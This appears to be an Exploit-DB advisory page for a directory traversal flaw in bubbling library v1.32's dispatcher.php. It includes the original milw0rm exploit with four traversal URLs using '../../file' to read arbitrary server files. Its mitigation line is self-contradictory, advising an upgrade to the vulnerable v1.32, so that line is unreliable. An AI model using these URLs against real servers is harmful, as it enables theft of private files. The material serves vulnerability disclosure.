bubbling library v1.32 Remote File Disclosure Vulnerabilities

vendor:

bubbling library

by:

Stack-Terrorist

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: bubbling library

Affected Version From: v1.32

Affected Version To: v1.32

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

bubbling library v1.32 Remote File Disclosure Vulnerabilities

A vulnerability in bubbling library v1.32 allows remote attackers to disclose arbitrary files from the server. This is due to the lack of proper input validation in the 'uri' parameter of the 'dispatcher.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable script. This will allow the attacker to read arbitrary files from the server.

Mitigation:

Upgrade to the latest version of bubbling library v1.32 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

## bubbling library v1.32 Remote File Disclosure Vulnerabilities
## Download script : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr

## Home : http://www.v4-team.com

## exploit :

http://localhost/ [script] /examples/dispatcher/framework/dispatcher.php?uri=../../file

http://localhost/ [script] /examples/dispatcher/dispatcher.php?uri=../../file
http://localhost/ [script] /examples/wizard/dispatcher.php?uri=../../file
http://localhost/ [script] /PHP/dispatcher.php?uri=../../file

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend 
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke 

# milw0rm.com [2008-01-28]